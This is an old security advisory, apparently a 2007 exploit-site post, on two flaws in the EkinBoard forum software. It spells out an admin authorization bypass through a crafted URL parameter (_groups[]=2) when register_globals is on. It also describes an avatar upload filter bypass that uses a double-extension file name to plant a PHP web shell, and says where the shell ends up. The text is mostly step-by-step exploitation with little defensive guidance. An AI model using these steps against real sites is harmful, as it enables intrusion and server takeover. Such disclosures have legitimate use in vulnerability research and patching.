EkinBoard 1.1.0 Remote File Upload / Auth Bypass Vulnerabilitie
===================================================================
EkinBoard <= 1.1.0 Remote File Upload / Auth Bypass Vulnerabilities
===================================================================
----[ EkinBoard Remote File Upload / Auth Bypass ... ITDefence.ru Antichat.ru ]
EkinBoard >= 1.1.0 Remote File Upload / Auth Bypass
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
We can bypass admin authorization if register_globals on . All admin panel script include this code
<?php
if(!in_array(2, $_groups)){
die("<center><span class=red>You need to be an admin to access this page!</span></center>");
}
?>
test1.ru/skvoznoy/backup.php?_groups[]=2
There is a bug in upload function . We can upload any file bypass filters . Name your shell like
file.php.gif and select it as your avatar . Then check uploaded/avatars/filename_your_id.php
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# 0day.today [2018-03-19] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo